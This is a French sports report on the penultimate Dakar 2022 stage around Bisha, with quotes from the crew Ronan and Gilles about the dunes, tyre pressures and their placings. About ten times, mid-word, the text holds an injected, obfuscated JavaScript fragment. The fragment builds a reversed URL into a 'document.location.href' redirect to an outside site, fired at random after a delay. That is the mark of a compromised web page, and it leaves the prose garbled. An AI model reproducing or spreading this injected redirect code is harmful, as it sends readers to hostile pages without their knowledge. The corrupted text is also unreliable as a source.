18ème de l’étape, 22ème au général.

Etape 11 – Bisha – Bisha (500km, 345km de spéciale).  

Entre les dunes majestueuses et les secteurs plus cassants, Ronan et Gilles n’ont pas boudé leur plaisir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout au long de l’avant dernière étape du Dakar. 22e au général, ils abordent la dernière spéciale avec vigilance mais sérénité.    

Jusqu’au bout, le Dakar a cette capacité incroyable de surprendre, d’emmener les pilotes dans des endroits qui marqueront durablement les mémoires. C’était le cas ce jeudi, lors de l’avant-dernière étape, une longue boucle autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour du bivouac de Bisha, 501 km pour 346 km, avec des dunes « magiques ». L’expression est de Ronan et l’explication qui suit aussi : « il s’agissait des plus grandes dunes que nous avons traversées depuis le début du rallye. Elles étaient presque blanches et formaient de gigantesques goulets. Les passagers de l‘hélicoptère qui étaient présents ont dû en prendre plein la vue ».  

Un Dakar « globalement très roulant »  

Et ce n’est pas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout. « Il y avait du pilotage, du rapide, du cassant, de belles dunes et l’autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to était parfaite. C’était la journée qu’on a préférée ». Gilles est plus catégorique : « c’est la seule spéciale qui ressemblait véritablement à une spéciale de Dakar ». Dans un tel contexte, rien de mieux que « bien rouler » et prendre du plaisir jusqu’au bout. C’est ce que se sont évertués à faire Ronan et Gilles. « Nous étions partis avec une pression plus basse que la veille (1,8 à l’avant et 1,7 à l’arrière) et la voiture n’avait rien à voir avec celle d’hier. Là, elle planait sur le sable et ça change toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout ».  

En revanche, les amas de poussière et le faible vent n’ont pas permis de creuser d’écarts conséquents. Partis 32e, les deux hommes achèvent néanmoins l’étape au 18e rang, à 18 min 49 sec du vainqueur du jour, Carlos Sainz.  « Ce Dakar était globalement très roulant et cela ne permet pas de faire des grands écarts, à part à coup de secondes », concède Gilles.  

« Demain, c’est déjà fini »  

Ce vendredi, place à l’ultime spéciale, 164 km (et 680 km au toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}total) même s’il se murmure qu’elle pourrait être raccourcie. « On n’y fait pas vraiment attention mais demain soir, le Dakar 2022 sera bouclé ». Rapidement, Ronan se reprend : « il reste encore une spéciale et on sait que toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout peut arriver jusqu’au bout, ce n’est pas la fin du rallye. Un relâchement et toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout peut changer ». « Avec l’expérience, on sait que beaucoup ne franchissent pas la ligne d’arrivée parce qu’il y a eu un manque de concentration donc il faudra bien l’aborder », sourit Gilles.  

Et pour conclure, on sent déjà une pointe de nostalgie chez Ronan. « Après une première semaine à trouver ses marques, la deuxième passe toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours plus vite. On fait de bonnes journées, on dort bien, la vie est bien installée sur le bivouac et dans le team. On se prépare toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours à quelque chose de long et dur, mais demain, c’est déjà fini. »